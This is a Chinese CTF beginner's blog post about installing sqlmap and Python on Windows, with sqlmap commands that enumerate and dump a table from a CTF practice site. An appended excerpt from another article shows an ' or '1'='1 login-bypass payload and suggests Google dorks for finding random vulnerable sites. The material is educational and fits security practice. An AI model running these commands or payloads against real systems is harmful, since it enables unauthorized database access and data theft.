180208—【CTF】Windows下 sqlmap 安装、配置、及快捷方式启动

legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
合法免责声明:事先未经双方同意,使用sqlmap攻击目标是非法的。遵守所在地适用法律是最终用户的责任。开发人员不承担任何责任,也不对由此程序造成的任何滥用或损害负责。
—sqlmap

按:CTF入坑第一天。
sqlmap是一款使用广泛的SQL注入工具。它本身是一个python脚本(.py文件)基本上配好python的环境变量之后它的配置就不成问题。

材料:

1、SqlMap下载地址:https://github.com/sqlmapproject/sqlmap/tarball/master 可下载到最新版本的SqlMap;
2、Python下载地址:https://www.python.org/ 可下载到相应的Python.建议下载2.7或者2.8版本的python,配合1中的sqlmap

python安装与环境变量的配置:

首先需要安装python。
顺路点下去就好,路径的话放在哪是自己随意选的,但是,你得自己找得到。。
但要注意此步:
这里写图片描述
最后一个需要进行选择,来确定Python的路径可以在cmd窗口之中被找到
选择 Add python.exe to Path>>Entire feature will be installed on local hard drive 。

静待安装完成之后,需要到cmd窗口中测试:
在命令行输入:python,出现该窗口为成功:
这里写图片描述
如果出现说:

‘python’不是内部或外部命令,也不是可运行的程序或批处理文件。

说明环境变量配置无效。
可以直接在cmd中输入:
path=%path%;D:\Python27 接着按”Enter”回车键。 D:\Python27 是Python的安装目录。
其他方法还可参照:python安装与环境变量的配置

sqlmap的安装和配置:

上面给的下载地址下载之后,解压。
下面是建议:
把解压之后得到的一个名为“sqlmapproject-sqlmap-1.2.2-5-g5b99180”的文件夹下的所有文件打包复制,在Python的安装目录中新建一个名为sqlmap的文件夹,粘贴。
为了好找。。仅此而已。。
这之后可以看到一个名为sqlmap的.py文件了。
双击打开之后,只会发现:
这里写图片描述
看见这个东西表示sqlmap已经安装完成了,但是这个界面毫无用处,一回车之后会关掉。。

这是因为启动sqlmap时并没有给它指令。

sqlmap的启动:

要使用sqlmap需要回到刚才的cmd窗口之中:
键入:

python E:Python27\sqlmap\sqlmap.py

最先的python表示该文件需要Python来解释,后面跟着的是它的路径。注意别错,另外.py不要丢。
但是这样调用之后还是只能按一下回车说拜拜,因为没有命令,只是调用,跟刚才的双击是一个666的效果。
在原命令下加 -h可以打开help界面。
python E:Python27\sqlmap\sqlmap.py -h
这里写图片描述

实操之后就会发现,这个命令需要一直写着。
例如,如果你想进入一个数据库的某张表中,一步步进入的过程即使命令越来越长的过程。。
例子来自实验吧一题:

python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"
python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"--dbs
python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"  -D my_db --tables
python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"  -D my_db -T thiskey --columns
8>python E:Python27\sqlmap\sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"  -D my_db -T thiskey -C k0y --dump
设置一个启动的快捷方式:

为了避免每次都要输入路径的尴尬,我们可以创建一个打开sqlmap的更快捷的方法:
桌面右键新建快捷方式:
先在位置栏输 cmd ,名字随心发挥吧。。
这里写图片描述
之后右键,属性。修改起始位置,填入sqlmap.py的路径。注意不要写sqlmap.py
这里写图片描述
确定保存,打开之后即为:
这里写图片描述
这时候直接输sqlmap.py即可启动了。
这里写图片描述

参考:
https://jingyan.baidu.com/article/60ccbceb64cc2064cbb19748.html
https://www.cnblogs.com/lauren1003/p/6131172.html

  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入1 简介 许多现实中对于网站的攻击往往是由于网站没有及时更新或者对于用户的输入没有进行检查。从缓冲区溢出说起,这样一种针对系统脆弱性的威胁,最根本的问题还是在于对于用户的输入没有进行检查。作为主要威胁之一的SQL注入带来了人们对于其应用和数据库的担忧。这个问题的出现有十年的时间了,但是现在仍旧在许多网站中出现。SQL注入就像许多当前主要的的web应用安全攻击问题也被划归在了对于用户输入的检查上。 正文 许多web开发者并不知道SQL语句能够被自定义(handle)并且假定SQL语句是一个让人信任的命令。这就让SQL语句能够绕过访问控制机制(access control),因此跳过标准的授权和认证检查。甚至有些时候SQL语句能够允许使用服务器操作系统上的命令行的权限。 直接的SQL注入命令是一种方法,它被攻击者构造或者是修改现成的SQL命令来暴露出隐藏的数据或者是覆盖掉有价值的数据,甚至在服务器上执行危险地系统指令 入门 结构化的语言是数据库的标准声明语言。这让(语言)变的更加简洁并且更易于使用。SQL起源于70年代的IBM实验室。SQL被用来让应用程序与数据库之间进行通信。 SQL使用如下的4种语言来对数据库进行操作 SELECT -从数据库中获得一条记录 INSERT-向数据库中插入一条记录 DELETE-从数据库中删除一条记录 UPDATE-从数据库中更新或者改变当前记录 当用户提交的语句被用作数据库的查询语句时SQL就能够发生。比如当用户被网站认证授权,用户发送一个带有”用户名”和”密码”的信息,用户名/密码就与存放在数据库中的内容进行核对。如果相同的话用户就被允许登录,否则用户登录失败。以下是一个在后台进行登录的例子。 代码 SELECT * FROM user WHERE username='$username' AND password='$password' 这个语句简单地指明了从user的表中查询用户名和username相等的,并且密码和password相等的。所以,如果用户发送用户名为”admin”,并且密码为”12345″,那么SQL语句被创建如下: SELECT * FROM user WHERE username='admin' AND password ='12345' 注入 那么,如果用户输入’ or ’1′=’1,第一个引号会终止输入的字符串,剩下的会被当做SQL语句,并且在SQL语句中1=1恒为真,这就能够让我们绕过注册机制 SELECT * FROM user WHERE username=’admin’ AND password =”or ’1′=’1′ -TRUE 上述是一个SQL注入的简单地例子,然而在实际过程中,SQL注入比这要复杂的多。在我们的渗透测试中,大多数时候我们有一个非常紧凑的计划表,所以这个时候我们需要一个自动化的攻击来为我们进行注入攻击。 SQLMAP就是一能够利用(系统)脆弱性的工具。它是开源的,并经常被用来在Python写的脆弱的DBMS上进行入侵的渗透测试。它能够检测并利用SQL上的漏洞,让我们举例在操作系统和数据库上使用sqlmap.py。 一步一步 我将尽可能地以最简洁的方式展示出来。 最常见的检测SQL注入的方法是通过在输入处添加一个单引号(')并且期待(系统)返回一个错误,有些应用程序并不会返回错误。这个时候我们就会利用true/false语句来检查是否这个应用程序会受到SQL注入的攻击。 为了随机的找到还有SQL注入的脆弱性的网站,你能够使用如下格式的语句利用google dork:inurl:news.php id =1?将会出现一堆google dork的数据并且为你过滤你搜索得到的结果提供了可能。那么让那个我们开始吧。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值